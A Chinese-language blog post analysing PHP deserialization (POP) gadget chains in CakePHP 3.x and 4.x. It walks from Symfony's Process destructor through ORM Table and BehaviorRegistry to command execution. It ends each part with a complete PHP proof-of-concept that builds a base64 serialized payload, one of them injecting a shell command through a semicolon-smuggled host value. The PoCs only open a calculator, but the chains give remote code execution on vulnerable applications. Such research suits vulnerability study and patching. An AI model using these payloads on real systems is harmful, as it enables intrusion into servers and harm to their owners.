最近网上公开了cakephp一些反序列化链的细节,但是没有公开poc,并且网上关于cakephp的反序列化链比较少,于是自己跟一下 ,构造pop链。
CakePHP简介
CakePHP是一个运用了诸如ActiveRecord、Association Data Mapping、Front Controller和MVC等著名设计模式的快速开发框架。该项目主要目标是提供一个可以让各种层次的PHP开发人员快速地开发出健壮的Web应用,而又不失灵活性。
3.x ≤ 3.9.6
入口位于vendor\symfony\process\Process.php
的__destruct方法
data:image/s3,"s3://crabby-images/97a89/97a89400cd61e816db555d6d7118a511fe1e76a6" alt=""
在一些老版本中,__destruct方法是这样的:
data:image/s3,"s3://crabby-images/01fc9/01fc95e0cf0a8e3415bcbed56ed07c9e614f88ba" alt=""
跟进stop方法:
data:image/s3,"s3://crabby-images/3e529/3e5294fde0de9fe62693865781271ac495118893" alt=""
跟进isRunning方法:
data:image/s3,"s3://crabby-images/5883a/5883a6d69a312765dc43a0e635b9dbcd651f663d" alt=""
$this->status
可控,可以继续进入updateStatus方法,让其等于"started"
即可
data:image/s3,"s3://crabby-images/3781d/3781d530de82d96e6e7a5bc52c574d54644a176c" alt=""
继续跟进readPipes方法:
data:image/s3,"s3://crabby-images/d86a1/d86a128353ac5af5962625798fb4979cdd2bf478" alt=""
发现$this->processPipes
可控且调用readAndWrite
方法,这样就我们可以调用任意类的__call
方法
全局搜索,找到vendor\cakephp\cakephp\src\ORM\Table.php
有合适的__call
方法:
data:image/s3,"s3://crabby-images/57d05/57d05ee845eb631b7308e942dcbf6476d45ee84b" alt=""
这里的$this->_behaviors
也可控,到这里我们就可以调用任意类的call
方法了
继续寻找,在vendor\cakephp\cakephp\src\ORM\BehaviorRegistry.php
找到了合适的call
方法:
data:image/s3,"s3://crabby-images/c0339/c0339431dc19e815460199611d0b2e01681bb684" alt=""
这里就可以调用任意类的任意方法了,但是参数不可控
再来看看进入call_user_func_array
的条件:
这里的$method
就是之前触发__call
的readAndWrite
方法
跟进hasMethod方法,$this->_methodMap
可控,所以可以使其返回true
data:image/s3,"s3://crabby-images/e97fc/e97fc50ee576e2489fa82483bdfa262113d3bc80" alt=""
再来看看has方法,是在父类ObjectRegistry
中定义的,$this->_loaded
也可控
data:image/s3,"s3://crabby-images/3e98a/3e98ad56c46c00bfd6c9d7cc78dd94c027703308" alt=""
所以条件成立,可以利用回调函数调用任意方法
接下来找到不需要参数的合适方法:
位于vendor\cakephp\cakephp\src\Shell\ServerShell.php
的main方法
data:image/s3,"s3://crabby-images/4eb08/4eb08bff0082e22376f3d750563b3a743baa2491" alt=""
执行的命令由可控参数$this->_host、$this->_port
等拼接而成,我们可以利用分号进行命令注入
但是由于前面的php -S
命令,在windows下没有php环境变量可能无法利用
在执行命令之前,还得先让两个$this->out
方法正常返回,否则会报错退出
一路跟进来到vendor\cakephp\cakephp\src\Console\ConsoleIo.php
data:image/s3,"s3://crabby-images/3ede9/3ede947a8be61cf980767420785e0aafa3da6b14" alt=""
这里的$level
为1,我们只需要让$this->_level
小于1即可使其返回true
到这里就可以执行系统命令了
data:image/s3,"s3://crabby-images/d3528/d352834bec3abd06ac18a6858c10d611cbb81a3c" alt=""
poc:
php
<?php
namespace Cake\Core;
abstract class ObjectRegistry
{
public $_loaded = [];
}
namespace Cake\ORM;
class Table
{
public $_behaviors;
}
use Cake\Core\ObjectRegistry;
class BehaviorRegistry extends ObjectRegistry
{
public $_methodMap = [];
protected function _resolveClassName($class){}
protected function _throwMissingClassError($class, $plugin){}
protected function _create($class, $alias, $config){}
}
namespace Cake\Console;
class Shell
{
public $_io;
}
class ConsoleIo
{
public $_level;
}
namespace Cake\Shell;
use Cake\Console\Shell;
class ServerShell extends Shell
{
public $_host;
protected $_port = 0;
protected $_documentRoot = "";
protected $_iniPath = "";
}
namespace Symfony\Component\Process;
use Cake\ORM\Table;
class Process
{
public $processPipes;
}
$pop = new Process([]);
$pop->status = "started";
$pop->processPipes = new Table();
$pop->processPipes->_behaviors = new \Cake\ORM\BehaviorRegistry();
$pop->processPipes->_behaviors->_methodMap = ["readandwrite"=>["servershell","main"]];
$a = new \Cake\Shell\ServerShell();
$a->_io = new \Cake\Console\ConsoleIo();
$a->_io->_level = 0;
$a->_host = ";open /System/Applications/Calculator.app;";
$pop->processPipes->_behaviors->_loaded = ["servershell"=>$a];
echo base64_encode(serialize($pop));
3.x某些版本、4.x ≤ 4.2.3
4.x版本前半部分的整体思路和3.x基本一样,部分代码有变动
4.x版本ServerShell
类修改了,没有之前一样好用的方法了
寻找新的调用链:
在vendor\cakephp\cakephp\src\Database\Statement\CallbackStatement.php
data:image/s3,"s3://crabby-images/ff596/ff596481704fa569751ee8581b7dabc76f82769a" alt=""
这里有动态调用,方法名可控,参数$row
通过$this->_statement->fetch($type)
获得
于是寻找可用的fetch
方法
在vendor\cakephp\cakephp\src\Database\Statement\BufferedStatement.php
有合适的方法:
data:image/s3,"s3://crabby-images/8981e/8981ec11a94f54081eb5245f4f6761c14a7cb218" alt=""
这里$this->buffer、$this->index、$this->_allFetched
参数均可控,可以返回我们指定的$row
值
于是可以达成任意方法执行,直接指定system执行系统命令
data:image/s3,"s3://crabby-images/a8838/a8838e63d41ed0bc792c35015a33a5cb926107ef" alt=""
poc:
php
<?php
namespace Cake\Core;
abstract class ObjectRegistry
{
public $_loaded = [];
}
namespace Cake\ORM;
class Table
{
public $_behaviors;
}
use Cake\Core\ObjectRegistry;
class BehaviorRegistry extends ObjectRegistry
{
public $_methodMap = [];
protected function _resolveClassName(string $class): ?string{
return $class;
}
protected function _throwMissingClassError(string $class, ?string $plugin): void{}
protected function _create($class, $alias, $config){}
}
namespace Cake\Database\Statement;
class StatementDecorator {
public $_statement;
}
class CallbackStatement extends StatementDecorator
{
public $_callback;
}
class BufferedStatement
{
public $_allFetched;
public $buffer = [];
protected $index = 0;
}
namespace Symfony\Component\Process;
use Cake\ORM\Table;
class Process
{
public $processPipes;
}
$pop = new Process([]);
$pop->status = "started";
$pop->processPipes = new Table();
$pop->processPipes->_behaviors = new \Cake\ORM\BehaviorRegistry();
$pop->processPipes->_behaviors->_methodMap = ["readandwrite"=>["callbackstatement","fetch"]];
$a = new \Cake\Database\Statement\CallbackStatement($statement, $driver,"");
$a->_callback = "system";
$a->_statement = new \Cake\Database\Statement\BufferedStatement($statement, $driver);
$a->_statement->_allFetched = true;
$a->_statement->buffer = ["open /System/Applications/Calculator.app"];
$pop->processPipes->_behaviors->_loaded = ["callbackstatement"=>$a];
echo base64_encode(serialize($pop));